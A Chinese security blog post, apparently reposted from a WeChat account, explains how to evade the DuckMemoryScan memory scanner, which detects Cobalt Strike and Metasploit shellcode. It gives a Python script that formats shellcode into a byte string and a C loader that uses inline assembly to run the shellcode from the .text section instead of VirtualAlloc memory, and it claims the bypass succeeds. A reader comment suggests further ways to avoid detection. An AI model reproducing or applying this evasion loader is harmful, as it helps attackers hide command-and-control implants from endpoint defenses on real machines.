蹭热点之绕过DuckMemoryScan

  • A+
所属分类:安全文章

 昨天的事,谢谢各位师傅们了,所以写了该文来感谢各位师傅。而且今天是元宵节,祝大家元宵节快乐哦。



蹭热点之绕过DuckMemoryScan



昨天,Github上出现了一个针对CS与MSF的内存扫描项目名叫DuckMemoryScan地址为:https://github.com/huoji120/DuckMemoryScan


根据该项目的介绍:

  1. HWBP hook检测 检测线程中所有疑似被hwbp隐形挂钩

  2. 内存免杀shellcode检测(metasploit,Cobaltstrike完全检测)

  3. 可疑进程检测(主要针对有逃避性质的进程[如过期签名与多各可执行区段])

  4. 无文件落地木马检测(检测所有已知内存加载木马)

  5. 简易rootkit检测(检测证书过期/拦截读取/证书无效的驱动)


也就是类似于之前的CobaltStrikeScan之类的工具,我们来看一下如何绕过它。


首先拿了一个我之前的免杀马做测试,发现成功的检测出来了,毕竟项目介绍中也写到了会对"VirtualAlloc"函数进行检测。


蹭热点之绕过DuckMemoryScan


那么我们就可以来想其他办法来操作了,项目介绍中说 但大部分普通程序均不会在VirtualAlloc区域内执行代码.一般都是在.text区段内执行代码,那我们在.text区段内执行代码不就行了嘛。


先使用我们的脚本转换一下shellcode


import binasciiimport sysimport re
if __name__ == "__main__":   if len(sys.argv) < 2: sys.exit(0) try: data = binascii.b2a_hex(open(sys.argv[1], "rb").read()).decode() except: print("Error reading %s" % sys.argv[1]) sys.exit(0) if "-list" in sys.argv: print("0x" + ",0x".join(re.findall("..", data))) else: print("\x" + "\x".join(re.findall("..", data)))


然后加载:


#include <Windows.h>
int main() { asm("call codent" ".byte {{SHELLCODE}}nt" "code:nt" "retnt");
return 0;}


成功写入


蹭热点之绕过DuckMemoryScan


成功绕过检测。


蹭热点之绕过DuckMemoryScan


当然方法还有很多,就看各位师傅发挥了(ps:每次检测这个程序都会检测出来微信,不明觉厉,23333)


     ▼
更多精彩推荐,请关注我们

蹭热点之绕过DuckMemoryScan



本文始发于微信公众号(鸿鹄实验室):蹭热点之绕过DuckMemoryScan

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:1   其中:访客  0   博主  0

    • Fay 0

      其实好像只要不用VirtualAlloc就能逃过检测(
      所以不改到.text段也没问题(不用VirtualAlloc执行shellcode方法也蛮多的